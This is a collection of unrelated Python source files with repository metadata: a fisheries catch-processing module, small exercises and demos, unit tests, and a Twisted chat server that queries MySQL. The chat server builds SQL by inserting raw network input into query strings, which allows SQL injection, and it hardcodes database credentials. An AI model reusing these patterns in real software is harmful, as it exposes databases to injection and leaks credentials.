            self.speciesCount -= len([x for x in submix.children if x.data(typeCol).value() == "Taxon"])
            # If the submix is the activeMix and we're removing the submix, then set the activeMix to None
            if submix.data(model.getColumnNumber('catchId')).value() == self._active_mix["catchId"]:
                self.activeMix = {"displayName": None, "catchId": None}
    elif type == "Submix":
        if isinstance(self._active_mix, QJSValue):
            self._active_mix = self._active_mix.toVariant()
        if catchId == self._active_mix["catchId"]:
            self.activeMix = {"displayName": None, "catchId": None}
        # recurse to check all children
        self.speciesCount -= len([x for x in item.children if x.data(typeCol).value() == "Taxon"])

    # Remove the rows
    parentIdx = model.parent(index)
    status = model.removeRows(index.row(), 1, parentIdx)

    # Decrement the species count - this is shown in the upper right corner of the screen
    # self.speciesCount -= 1

    # Delete from the database. The recursive CTEs gather the catch row and
    # every descendant catch (and their specimens) before deleting.
    if isinstance(catchId, int):
        catch_sql = """
            WITH RECURSIVE subcatch(n) AS (
                SELECT CATCH_ID FROM CATCH WHERE CATCH_ID = ?
                UNION
                SELECT c.CATCH_ID FROM CATCH c, subcatch
                WHERE c.PARENT_CATCH_ID = subcatch.n
            )
            DELETE FROM CATCH WHERE CATCH_ID in subcatch;
        """
        specimen_sql = """
            WITH RECURSIVE subcatch(n) AS (
                SELECT CATCH_ID FROM CATCH WHERE CATCH_ID = ?
                UNION
                SELECT c.CATCH_ID FROM CATCH c, subcatch
                WHERE c.PARENT_CATCH_ID = subcatch.n
            ),
            subspecimens(n) AS (
                SELECT SPECIMEN_ID FROM SPECIMEN s INNER JOIN CATCH c
                    ON c.CATCH_ID = s.CATCH_ID WHERE c.CATCH_ID in subcatch
                UNION
                SELECT s.SPECIMEN_ID FROM SPECIMEN s, subspecimens
                WHERE s.PARENT_SPECIMEN_ID = subspecimens.n
            )
            DELETE FROM SPECIMEN WHERE SPECIMEN_ID IN subspecimens;
        """
        params = [catchId, ]
        # Delete specimens first so no orphaned specimen rows survive the catch delete.
        self._db.execute(query=specimen_sql, parameters=params)
        self._db.execute(query=catch_sql, parameters=params)
def _get_debris(self):
    """
    Retrieve all of the debris items from the database; used to populate the
    list of possible debris in the ProcessCatchScreen.
    :return: list of dicts from CATCH_CONTENT_VW, sorted case-insensitively
             by displayName
    """
    sql = "SELECT * FROM CATCH_CONTENT_VW WHERE TYPE = 'Debris';"
    debris = [
        {
            "displayName": row[2],
            "weight": None,
            "count": None,
            "type": row[13],
            "catchContentId": row[14],
        }
        for row in self._db.execute(sql)
    ]
    return sorted(debris, key=lambda item: item["displayName"].upper())
def _get_species(self):
    """
    Retrieve all of the species from the database; used to populate the list
    of possible species in the ProcessCatchScreen.
    :return: list of species dicts, sorted case-insensitively by displayName
    """
    # FRAM-specific protocols keyed by TAXONOMY_ID - these override the
    # protocol column from the view when present (non-FRAM PIs may also have
    # a sampling plan for a given TAXONOMY_ID).
    protocols = self._get_fram_protocols()

    # TODO (todd.hay) Get the species-specific protocol information as well
    sql = "SELECT * FROM CATCH_CONTENT_VW WHERE TYPE = 'Taxon';"
    species = []
    for row in self._db.execute(sql):
        species.append({
            "taxonomyId": row[0],
            "protocol": protocols.get(row[0], row[1]),
            "displayName": row[2],
            "scientificName": row[3],
            "commonName1": row[4] or "",
            "commonName2": row[5] or "",
            "commonName3": row[6] or "",
            "weight": None,
            "count": None,
            "depthMin": row[7] or None,
            "depthMax": row[8] or None,
            "latMin": row[9] or None,
            "latMax": row[10] or None,
            "isMostRecent": row[11] or "False",
            "isLastNOperations": row[12] or "",
            "type": row[13] or None,
            "catchContentId": row[14] or None,
        })
    return sorted(species, key=lambda item: item["displayName"].upper())
@staticmethod
def _set_selected_species_model():
    """
    Method that builds an empty tree model holding the species already
    selected for the active haul.
    :return: SpeciesTreeModel - the model used with the tvSelectedSpecies TreeView
    """
    # TODO Need to add sampleType (i.e. fish, salmon, coral - to drive Fish Sampling Screen)
    # headers = ["taxonomyId", "displayName", "scientificName",
    #        "protocol", "weight", "count", "depthMin", "depthMax", "latMin", "latMax",
    #        "isMostRecent", "isLastNOperations", "type", "sampleType", "catchContentId", "catchId"]
    # Column order here defines the model's role/column layout used throughout
    # the ProcessCatch code (getColumnNumber / getRoleNumber lookups).
    headers = ["taxonomyId", "scientificName", "commonName1", "commonName2", "commonName3", "displayName",
               "protocol", "weight", "count", "depthMin", "depthMax", "latMin", "latMax",
               "isMostRecent", "isLastNOperations", "type", "sampleType", "catchContentId", "catchId"]
    data = []
    species_model = SpeciesTreeModel(headers=headers, data=data)
    return species_model
@pyqtProperty(QVariant, notify=selectedIndexChanged)
def selectedIndex(self):
    """
    Returns the currently selected item (a dict holding at least
    "currentIndex" - see updateWeightCount).
    :return: the stored selection value
    """
    return self._selected_index

@selectedIndex.setter
def selectedIndex(self, value):
    """
    Store the current selection and emit selectedIndexChanged.
    :param value: selection data; QJSValue is converted to a plain dict
    :return: None
    """
    # if index is None:
    #     index = QModelIndex()
    if isinstance(value, QJSValue):
        value = value.toVariant()
    self._selected_index = value
    self.selectedIndexChanged.emit()
@pyqtSlot()
def updateWeightCount(self):
    """
    Method called when returning from WeighBaskets to update the weight /
    number-of-baskets count of the currently selected species in the
    selected-species tree model.
    :return: None
    """
    # Get the updated weight/count data for the currently selected species
    catch_id = self._app.state_machine.species["catch_id"]
    results = self._get_basket_weights_counts(catch_id=catch_id)
    try:
        # Update the model: write each returned value ("weight", "count")
        # into the matching column of the selected row.
        model = self.seModel
        idx = self.selectedIndex["currentIndex"]
        item = model.getItem(idx)
        row = idx.row()
        for x in list(results):
            col = model.getColumnNumber(x)
            if col != -1:
                index = model.createIndex(row, col, item)
                value = results[x]
                role = model.getRoleNumber(role_name=x)
                status = model.setData(index, value, role)
                logging.info('{0} = {1}, row: {2}, col: {3}, role: {4}, status: {5}'.
                             format(x, value, row, col, role, status))
    except Exception as ex:
        # Fix: previously `pass` - model-update failures were swallowed
        # silently. Still non-fatal, but now logged for diagnosis.
        logging.error("Failed to update weight/count for catch_id %s: %s", catch_id, ex)
def _get_basket_weights_counts(self, catch_id):
    """
    Method to get the total weight + number of baskets for the given catch_id. This is called
    by initialize_tree when entering ProcessCatch and by TrawlBackdeckStateMachine when
    returning to ProcessCatch from the WeighBaskets screen, so as to update the values for the
    currently selected species
    :param catch_id: int
    :return: dict - contains the "weight" and "count"; NOTE: implicitly
             returns None when catch_id is not an int (callers guard with
             try/except)
    """
    if not isinstance(catch_id, int):
        return
    try:
        display_name = Catch.select().where(Catch.catch == catch_id).get().display_name
    except DoesNotExist as ex:
        display_name = ""
        logging.info('Could not find the display name: ' + str(ex))

    # Recursive CTE: walk the catch plus its same-named descendants, then sum
    # only the rows that represent physical baskets (RECEPTACLE_SEQ set).
    baskets_sql = """
        WITH RECURSIVE subcatch(n) AS (
            SELECT c.CATCH_ID FROM CATCH c
                WHERE c.CATCH_ID = ?
            UNION
            SELECT c.CATCH_ID FROM CATCH c, subcatch
                WHERE c.PARENT_CATCH_ID = subcatch.n AND c.DISPLAY_NAME = ?
        )
        select WEIGHT_KG, SAMPLE_COUNT_INT from CATCH c
            WHERE c.CATCH_ID in subcatch AND c.RECEPTACLE_SEQ IS NOT NULL
    """
    params = [catch_id, display_name]
    total_weight = 0
    num_baskets = 0
    for basket in self._db.execute(query=baskets_sql, parameters=params):
        # Baskets without a recorded weight are ignored for both totals.
        total_weight += basket[0] if basket[0] else 0
        num_baskets += 1 if basket[0] else 0
    # logging.info('display name: ' + str(display_name) + ', weight: ' + str(total_weight) + ', count: ' + str(num_baskets))
    return {"weight": total_weight, "count": num_baskets}
@pyqtSlot(result=QVariant)
def checkSpeciesForData(self):
    """
    Method to determine if catch / specimen data has been collected for the
    currently selected species (per the state machine's catch_id).
    :return: QVariant - dict - counts of baskets + specimens; both counts are
             -1 when the queries fail
    """
    try:
        results = {"baskets": 0, "specimens": 0}
        catch_id = self._app.state_machine.species["catch_id"]

        # Count basket rows (RECEPTACLE_SEQ set) for the catch and all descendants.
        baskets_sql = """
            WITH RECURSIVE subcatch(n) AS (
                SELECT c.CATCH_ID FROM CATCH c
                    WHERE c.CATCH_ID = ?
                UNION
                SELECT c.CATCH_ID FROM CATCH c, subcatch
                    WHERE c.PARENT_CATCH_ID = subcatch.n
            )
            select count(*) from CATCH c WHERE c.CATCH_ID in subcatch
                AND c.RECEPTACLE_SEQ IS NOT NULL
        """
        for basket in self._db.execute(query=baskets_sql, parameters=[catch_id,]):
            results["baskets"] = basket[0]

        # Count top-level specimens (PARENT_SPECIMEN_ID IS NULL) attached to
        # the catch subtree; the second CTE also walks specimen children.
        specimens_sql = """
            WITH RECURSIVE subcatch(n) AS (
                SELECT c.CATCH_ID FROM CATCH c WHERE c.CATCH_ID = ?
                UNION
                SELECT c.CATCH_ID FROM CATCH c, subcatch
                    WHERE c.PARENT_CATCH_ID = subcatch.n
            ),
            subspecimens(n) AS (
                SELECT SPECIMEN_ID FROM SPECIMEN s INNER JOIN CATCH c
                    ON c.CATCH_ID = s.CATCH_ID WHERE c.CATCH_ID in subcatch
                UNION
                SELECT s.SPECIMEN_ID FROM SPECIMEN s, subspecimens
                    WHERE s.PARENT_SPECIMEN_ID = subspecimens.n
            )
            SELECT count(*) FROM SPECIMEN WHERE SPECIMEN_ID IN subspecimens
                AND PARENT_SPECIMEN_ID IS NULL;
        """
        for specimen in self._db.execute(query=specimens_sql, parameters=[catch_id,]):
            results["specimens"] = specimen[0]
    except Exception as ex:
        logging.info("Error getting basket and/or specimen counts: " + str(ex))
        # Sentinel values signal "unknown" to the caller.
        return {"baskets": -1, "specimens": -1}
    return results
@pyqtSlot(result=QVariant)
def get_species_per_haul(self):
    """
    Method to return all of the selected species for the current haul.
    :return: list of dicts - one per CATCH row for the haul
    """
    # Fix: the original assigned a CATCH_VW query to `sql` and then
    # immediately overwrote it with the join below; the dead statement
    # has been removed.
    sql = "SELECT c.CATCH_ID, c.PARENT_CATCH_ID, c.WEIGHT_KG, " + \
          "c.SAMPLE_COUNT_INT, t.SCIENTIFIC_NAME, cc.DISPLAY_NAME " + \
          "FROM CATCH c " + \
          "INNER JOIN HAULS h ON c.OPERATION_ID = h.HAUL_ID " + \
          "INNER JOIN CATCH_CONTENT_LU cc ON cc.CATCH_CONTENT_ID = c.CATCH_CONTENT_ID " + \
          "INNER JOIN TAXONOMY_LU t ON cc.TAXONOMY_ID = t.TAXONOMY_ID " + \
          "WHERE h.HAUL_ID = ?;"
    params = [self._app.state_machine._haul["haul_id"], ]
    species = []
    for s in self._db.execute(query=sql, parameters=params):
        species.append({
            "catch_partition_id": s[0],
            "parent_id": s[1] if s[1] else None,
            "weight": s[2] if s[2] else None,
            "count": s[3] if s[3] else None,
            "scientific_name": s[4] if s[4] else None,
            "display_name": s[5] if s[5] else None,
        })
    return species
def get_salmon_species(self):
    """
    Method to return all of the salmon species. Used to drive the salmon-based
    FishSamplingScreen selection in ProcessCatchScreen.qml
    :return: list - all of the taxonomyId related to salmon species
    """
    sql = "SELECT DISTINCT TAXONOMY_ID FROM SALMON_SPECIES_VW;"
    return [record[0] for record in self._db.execute(query=sql)]
def get_coral_species(self):
    """
    Method to return all of the coral species. Used to drive the coral-based
    FishSamplingScreen selection in ProcessCatchScreen.qml
    :return: list - all of the taxonomyId related to coral species
    """
    sql = "SELECT DISTINCT TAXONOMY_ID FROM CORAL_SPECIES_VW;"
    return [record[0] for record in self._db.execute(query=sql)]
def get_sponge_species(self):
    """
    Method to return all of the sponge species. Used to drive the
    sponge-based selection in ProcessCatchScreen.qml to push the user over
    to the SpecialActionsScreen.qml
    :return: list - all of the taxonomyId related to sponge species
    """
    sql = "SELECT DISTINCT TAXONOMY_ID FROM SPONGE_SPECIES_VW;"
    return [record[0] for record in self._db.execute(query=sql)]
def get_rockfish_species(self):
    """
    Method to return all of the rockfish species. Used to drive barcode
    collection for Peter Sudmant (UC Berkeley) asking for muscle tissue for
    any rockfish during the 2019 survey season
    :return: list - all of the taxonomyId related to rockfish species
    """
    sql = "SELECT DISTINCT TAXONOMY_ID FROM ROCKFISH_SPECIES_VW;"
    return [record[0] for record in self._db.execute(query=sql)]
@pyqtSlot(str, int, result=bool)
def checkSpeciesType(self, type, taxonId):
    """
    Check whether the given taxonomy id belongs to the named special group
    (salmon / coral / sponge / rockfish).
    :param type: str - one of "salmon", "coral", "sponge", "rockfish"
    :param taxonId: int - taxonomy id to test
    :return: bool - True if taxonId is in the named group, otherwise False.
             Fix: the original fell off the end and implicitly returned None
             (not a bool, despite result=bool) for unknown type values;
             an explicit False is returned now (backward compatible - both
             are falsy).
    """
    groups = {
        "salmon": self._salmon,
        "coral": self._corals,
        "sponge": self._sponges,
        "rockfish": self._rockfish,
    }
    return taxonId in groups.get(type, ())
# @pyqtSlot(str, str, QModelIndex)
@pyqtSlot()
def renameMixes(self):
    """
    Method called by ProcessCatchScreen.qml, in the removeSpecies function when a mix or
    a submix is removed from the selected species TreeView. This does not relabel the
    items in the TreeView, as that is handled directly by the tree view, however, it does
    update the catch.display_name's for all of the mixes and submixes that follow the
    removed mix, both in the database (via peewee Catch.update) and in the tree model.
    :return: None
    """
    # if mixType is None:
    #     return
    #
    # if not isinstance(parentIndex, QModelIndex):
    #     return
    try:
        logging.info(f"mixes: {self.seModel.mixCount}")
        type_col = self.seModel.getColumnNumber("type")
        display_name_col = self.seModel.getColumnNumber("displayName")
        display_name_role = self.seModel.getRoleNumber(role_name="displayName")
        catch_id_col = self.seModel.getColumnNumber("catchId")
        catch_id_role = self.seModel.getRoleNumber(role_name="catchId")
        mixes = [x for x in self.seModel.rootItem.children
                 if x.data(column=type_col).value() == "Mix"]
        for mix_count, mix in enumerate(mixes):
            mix_display_name = mix.data(column=display_name_col).value()
            # Renumber only mixes whose "Mix #N" label no longer matches their
            # position (labels are 1-based, enumerate is 0-based).
            if int(mix_display_name.strip("Mix #")) - 1 != mix_count:
                catch_id = mix.data(column=catch_id_col).value()
                value = f"Mix #{mix_count+1}"
                Catch.update(display_name = value).where(Catch.catch == catch_id).execute()
                index = self.seModel.createIndex(mix.row, display_name_col, mix)
                self.seModel.setData(index=index, value=value, role=display_name_role)
                logging.info(f"mix to update, catch_id: {catch_id}, {mix_display_name} > {value}")
            # Renumber this mix's submixes the same way.
            submixes = [x for x in mix.children
                        if x.data(column=type_col).value() == "Submix"]
            for submix_count, submix in enumerate(submixes):
                sm_display_name = submix.data(column=display_name_col).value()
                if int(sm_display_name.strip("Submix #")) - 1 != submix_count:
                    catch_id = submix.data(column=catch_id_col).value()
                    value = f"Submix #{submix_count+1}"
                    Catch.update(display_name=value).where(Catch.catch == catch_id).execute()
                    index = self.seModel.createIndex(submix.row, display_name_col, submix)
                    self.seModel.setData(index=index, value=value, role=display_name_role)
                    logging.info(f"submix to update, catch_id: {catch_id}, {sm_display_name} > {value}")
    except Exception as ex:
        logging.error(f"Error renaming the mixes: {ex}")
| [
"will.smith@noaa.gov"
] | will.smith@noaa.gov |
32af9934c3684fece98b2a567b106cb16cc30b4c | 605d63d23bc2e07eb054979a14557d469787877e | /atest/testdata/variables/same_variable_file_names/different_variable_files/suite3/subsuite1/variable.py | 54f1c9224cb5c5536b9cbabadb8493758f6a6413 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | robotframework/robotframework | 407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf | cf896995f822f571c33dc5651d51365778b1cf40 | refs/heads/master | 2023-08-29T03:19:00.734810 | 2023-08-27T18:14:48 | 2023-08-28T18:14:11 | 21,273,155 | 8,635 | 2,623 | Apache-2.0 | 2023-09-05T04:58:08 | 2014-06-27T11:10:38 | Python | UTF-8 | Python | false | false | 38 | py | SUITE = SUITE_31 = "suite3.subsuite1"
| [
"peke@iki.fi"
] | peke@iki.fi |
c62e8b82b16c1d7d6bb000b63b61a3cb931b975c | bd02b45c9131379c1059ef8190b3251fe9578c35 | /Part 2 - Regression/Section 8 - Decision Tree Regression/Decision_Tree_Regression/decision_tree_regression.py | 11ab23753385d90828c99ebf2b66d595b95be534 | [] | no_license | katchme88/models | e85b26979d4bb24a4f1657ce2256cdc5d82c9da2 | e81009d37d4cddcc3dc79475118d4ec1babfe87d | refs/heads/master | 2020-06-21T13:17:39.750459 | 2019-07-17T21:14:08 | 2019-07-17T21:14:08 | 197,462,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | # Decision Tree Regression
# Decision Tree Regression demo script.

# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Importing the dataset (single feature: position level -> salary)
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values   # 1:2 keeps X two-dimensional (n_samples, 1)
y = dataset.iloc[:, 2].values

# No train/test split or feature scaling: the dataset is tiny and decision
# trees are scale-invariant.

# Fitting Decision Tree Regression to the dataset
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(random_state = 0)
regressor.fit(X, y)

# Predicting a new result
# Fix: predict() requires a 2-D array-like of shape (n_samples, n_features);
# passing the bare scalar 6.5 raises a ValueError on modern scikit-learn.
y_pred = regressor.predict([[6.5]])

# Visualising the Decision Tree Regression results
plt.scatter(X, y, color='red')
plt.plot(X, regressor.predict(X), color='blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position Level')
plt.ylabel('Salary')
plt.show()

# Visualising the Decision Tree Regression results (higher resolution, so the
# piecewise-constant steps of the tree are visible)
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X, y, color = 'red')
plt.plot(X_grid, regressor.predict(X_grid), color = 'blue')
plt.title('Truth or Bluff (Decision Tree Regression)')
plt.xlabel('Position level')
plt.ylabel('Salary')
plt.show() | [
"talha@liveblockauctions.com"
] | talha@liveblockauctions.com |
f13d5c9080a5c0a35528af52c3526818137fe27e | 47386073517c1d5bd0d6e96ded48e0bbb9cdd7a4 | /src/study_cookbook/10模块和包/运行目录或压缩文件.py | 15c8839b803b0f8f296146c8eb820a6d8421bab1 | [] | no_license | halysl/python_module_study_code | f733eba00de75ebd1cdc9c1e9e36f3a7eee03c93 | 189fd3878b0abe68fd56e11357e88facdb4a186f | refs/heads/master | 2022-07-21T06:51:32.129654 | 2021-08-05T09:14:15 | 2021-08-05T09:14:15 | 148,780,484 | 1 | 0 | null | 2022-07-06T20:26:28 | 2018-09-14T11:39:21 | HTML | UTF-8 | Python | false | false | 277 | py | # -*- coding: utf-8 -*-
"""
myapplication/
spam.py
bar.py
grok.py
__main__.py
"""
"""
bash % python3 myapplication
"""
"""
bash % ls
spam.py bar.py grok.py __main__.py
bash % zip -r myapp.zip *.py
bash % python3 myapp.zip
... output from __main__.py ...
"""
| [
"halysl0817@gmail.com"
] | halysl0817@gmail.com |
12bc855aadc0ed74e0322b14d8cacc2223dd6959 | 82f83a3897c940f695d348fd895af9158f331c34 | /lab2.2.py | 0a99eff9225ede162a0c39689deae9f7283871ed | [] | no_license | sTorba24/laboratory1 | 617b80b46de36c91840ebdb60007e584320d64af | a6ec96bd8fbf41004720be60f4c237addb006f9f | refs/heads/master | 2020-09-08T07:24:41.032389 | 2019-11-11T20:46:24 | 2019-11-11T20:46:24 | 221,061,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """2.Дано ціле число N(>1).Вивести найбільше значення із цілих
чисел K , для яких сума 1+2+…+К буде менше або дорівнює N , і
саму цю суму."""
import re

# Accept an optional sign followed by digits.
re_integer = re.compile(r"^[-+]{0,1}\d+$")


def validator(pattern, promt):
    """Keep prompting until the input matches *pattern*; return the raw text."""
    text = input(promt)
    while not bool(pattern.match(text)):
        text = input(promt)
    return text


def int_greater_zero_validator(prompt):
    """Prompt until a strictly positive integer is entered; return it as int."""
    number = int(validator(re_integer, prompt))
    while number <= 0:
        number = int(validator(re_integer, prompt))
    return number


n = int_greater_zero_validator("Введіть значення N(N>1)\n")
# Task: find the largest K such that 1 + 2 + ... + K <= N, and print that
# sum and K.
# Fix: the original loop kept adding while n >= s and then printed AFTER the
# sum had already exceeded N (e.g. for N=5 it printed sum=6, K=4 instead of
# sum=3, K=2). Here we only add the next term while it still fits.
k = 0
s = 0
while s + k + 1 <= n:
    k += 1
    s += k
print(s, k)
print('Цикл завершено')
| [
"noreply@github.com"
] | noreply@github.com |
e21aec5d537bc04c4929f029b1ac0aa67ad21410 | efb4bdb3f1d2b0c87c4b6120a06e03fa28df3b15 | /exercise9/9-2/public/test_library.py | 2ec89620ea73b729be6237e8c7da044b60884177 | [] | no_license | pignuante/ETH | 7ddbee9ea1eaadcc111b9eb30ee84b74b653d7b7 | 5386e424bc1cdb9693228bac80f221bbefc38f12 | refs/heads/main | 2023-01-20T08:16:41.112242 | 2020-12-02T07:39:54 | 2020-12-02T07:39:54 | 315,497,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | #!/usr/bin/env python3
from unittest import TestCase
from public.library import Library
from public.movie import Movie
from public.moviebox import MovieBox
class LibraryTest(TestCase):
    """Unit tests for the Movie / MovieBox / Library classes."""

    def test_repr_movie(self):
        # repr() must be a constructor-style string with title, actor list, duration.
        actual = repr(Movie("T", ["A", "B"], 123))
        expected = 'Movie("T", ["A", "B"], 123)'
        self.assertEqual(expected, actual)

    def test_repr_moviebox(self):
        # A MovieBox repr nests the repr of its contained movies.
        actual = repr(MovieBox("T", [Movie("T2", ["A", "B"], 234)]))
        expected = 'MovieBox("T", [Movie("T2", ["A", "B"], 234)])'
        self.assertEqual(expected, actual)

    def test_library(self):
        # Total duration sums loose movies and movies inside boxes: 142+175+96.
        a = Movie("The Shawshank Redemption", ["Robbins", "Freeman"], 142)
        b = Movie("The Godfather", ["Brando", "Pacino"], 175)
        c = Movie("12 Angry Men", ["Fonda", "Cobb"], 96)
        d = MovieBox("Top Movies", [b, c])
        l = Library()
        l.add_movie(a)
        l.add_movie(d)
        self.assertEqual(413, l.get_total_duration())

    # This current test suite only contains very basic test cases. By now,
    # you have some experience in writing test cases. We strongly encourage
    # you to implement further test cases. The additional tests can be run via
    # 'Test&Run' in ACCESS. These tests won't affect the grading of your solution
    # directly, but they can help you with identifying relevant corner cases
    # that you have to consider in your implementation.
| [
"syaoran215@naver.com"
] | syaoran215@naver.com |
2a5148f46a6509ada6a2311abb815eaa87a49e5a | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/tlm/data_gen/robust_gen/gen_runner2/pairwise_desc_neg_major.py | 5e2915d046f6499f00a526baceaf2ea5ad156de6 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 678 | py | from functools import partial
from data_generator.job_runner import JobRunner
from epath import job_man_dir
from tlm.data_gen.adhoc_datagen import LeadingN
from tlm.data_gen.robust_gen.robust_generators import RobustPairwiseTrainGen2
from tlm.data_gen.run_robust_gen import RobustWorker
def main():
max_seq_length = 512
encoder = LeadingN(max_seq_length, 1)
worker_factory = partial(RobustWorker,
RobustPairwiseTrainGen2(encoder, max_seq_length, "desc", 1000, "neg_major_enum"))
runner = JobRunner(job_man_dir, 4, "robust_pairwise_head_desc_neg_major", worker_factory)
runner.start()
if __name__ == "__main__":
main()
| [
"lesterny@gmail.com"
] | lesterny@gmail.com |
e28025510dfda22da1bec3ee0cf73ea95800a66f | 91e1abcf2ef0aaa20f3e426d1dfc7d81efcd0b3c | /servers/chat.py | 383babc3f63a653ed5bc0a07aebcd55887aa5fbb | [] | no_license | Ohmfrh/Python-WebSocket | 6272f8dcaf926e22d83a827041511ebf1a85ea83 | e55cbd68632068b635cb84dcc1b85fcfdbecdce4 | refs/heads/master | 2021-01-18T09:57:29.699165 | 2016-05-04T17:16:48 | 2016-05-04T17:16:48 | 44,284,509 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,335 | py | import MySQLdb
from twisted.protocols import basic
from twisted.internet import reactor, protocol
import json
modules = []
class MyChat(basic.LineReceiver):
def connectionMade(self):
self.factory.clients.append(self)
print "Got new client!"
def connectionLost(self, reason):
print "Lost a client!"
self.factory.clients.remove(self)
def lineReceived(self, line):
split = line.split('=')
if line == 'exit':
self.transport.loseConnection()
if split[0] == 'module':
obj = {}
obj['module'] = split[1]
obj['thread'] = self
modules.append(obj)
else:
if len(modules) > 0:
i = 0
for module in modules:
if module['thread'] == self:
print "Encontrado: " + module['module']
break
i += 1
print modules[i]['module']
if modules[i]['module'] == 'RFID':
usrId = databaseQuery(line, modules[i]['module'])
connections = databaseQuery('', 'checkLogged')
if usrId != -1 and connections <= 5:
print usrId
modules[i]['thread'].transport.write('1')
for module in modules:
if module['module'] == 'audio/video':
print "Enviar a misterchanz"
video = databaseQuery(usrId, 'video')
audio = databaseQuery(usrId, 'audio')
user = databaseQuery(usrId, 'user')
print user
persona = {}
data = {}
persona['nombre'] = user['name']
persona['audio'] = audio
persona['img'] = video
data['persona'] = persona
if user['logged'] == '0':
data['accion'] = 'in'
print databaseQuery(usrId, 'login')
elif user['logged'] == '1':
data['accion'] = 'out'
print databaseQuery(usrId, 'logout')
else:
print "????"
json_data = json.dumps(data)
j=0
for module in modules:
if module['module'] == 'audio/video':
databaseQuery(json_data, 'pipeline')
modules[j]['thread'].transport.write(json_data)
break
j += 1
break
else:
print "SEARCHING"
else:
self.transport.write('0')
elif modules[i]['module'] == 'audio/video':
print "De misterchanz"
else:
print "NO MODULES"
def message(self, message):
# data = {}
# data['name'] = 'daniel'
# json_data = json.dumps(data)
# self.transport.write(json_data)
self.transport.write(message)
def databaseQuery(line, module):
db = MySQLdb.connect(host="localhost", user="daniel", passwd="12345", db="aula")
if module == 'RFID':
usrId = -1
query = """SELECT usr.id AS userId FROM usuarios_usersys AS usr
LEFT JOIN identificacion_identify AS id
ON usr.id=id.usersys_id WHERE id.string='%s';""" % (line)
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
usrId = row[0]
cursor.close()
db.close()
return usrId
elif module == 'video':
query = """SELECT usr.name, usr.last_names, i.name, i.path, s.address FROM usuarios_usersys AS usr
RIGHT JOIN imagenes_userimage AS ui ON usr.id=ui.user_id LEFT JOIN imagenes_image AS i
ON i.id=ui.image_id LEFT JOIN multimedia_server AS s ON s.id=i.server_id WHERE usr.id=%i;""" % (line)
cursor = db.cursor()
cursor.execute(query)
list = buildJSONDB(cursor, 'video')
db.close()
cursor.close()
return list
elif module == 'audio':
query = """SELECT s.address, a.path, a.name, a.album, a.artist, a.image FROM usuarios_usersys AS usr
RIGHT JOIN musica_usersong AS ua ON usr.id=ua.user_id LEFT JOIN musica_song AS a ON a.id=ua.song_id
LEFT JOIN multimedia_server AS s ON s.id=a.server_id WHERE usr.id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
list = buildJSONDB(cursor, 'audio')
cursor.close()
db.close()
return list
elif module == 'user':
obj = {}
query = """SELECT name, last_names, logged FROM usuarios_usersys WHERE id=%i;""" % (line)
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
name = row[0] + ' ' + row[1]
logged = row[2]
break
obj['name'] = name
obj['logged'] = logged
cursor.close()
db.close()
return obj
elif module == 'logout':
print "LOGOUT"
query = """UPDATE usuarios_usersys SET logged=0 WHERE id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
elif module=='login':
print "LOGIN"
query = """UPDATE usuarios_usersys SET logged=1 WHERE id=%i""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
elif module == 'checkLogged':
print "IN LOGGED"
count = 0
query = """SELECT COUNT(*) FROM usuarios_usersys WHERE logged='1'"""
cursor = db.cursor()
cursor.execute(query)
for row in cursor.fetchall():
return row[0]
elif module == 'pipeline':
query = """INSERT INTO home_pipeline (pipe) VALUES ('%s')""" % (line)
cursor = db.cursor()
cursor.execute(query)
db.commit()
cursor.close()
db.close()
else:
db.close()
return -1
def buildJSONDB(cursor, module):
obj = {}
list = []
if module == 'video':
for row in cursor.fetchall():
path = 'http://' + row[4] + row[3] + row[2]
list.append(path)
return list
elif module == 'audio':
for row in cursor.fetchall():
list.append({'nombre': row[2], 'src': 'http://' + row[0] + row[1] + row[2], 'artista':row[3],
'album':row[4], 'imagen': row[5]})
print list
return list
factory = protocol.ServerFactory()
factory.protocol = MyChat
factory.clients = []
reactor.listenTCP(9090, factory)
reactor.run()
| [
"dancassig@gmail.com"
] | dancassig@gmail.com |
caeb7a7a1f1adb6c1f1886cc8d8394efc67d7d5c | edfc2f6a7cf90ee0e3acbe68e22512e6b40059ab | /6/6.py | a97fc1dff489d7c34ca8e6685b14ebf9a8afc832 | [] | no_license | tangyao0792/ProjectEular | 43fd9908213cc5a09519ea701928127ea59146b3 | a65d1066c86126968929ed967763a4e69977b128 | refs/heads/master | 2021-01-01T15:40:07.345083 | 2013-01-11T16:04:26 | 2013-01-11T16:04:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | sum1 = 0
sum2 = 0
for i in range(1 , 101):
sum1 = sum1 + i*i
sum2 = sum2 + i
sum2 = sum2 * sum2
print sum2 - sum1
| [
"tangyao0792@gmail.com"
] | tangyao0792@gmail.com |
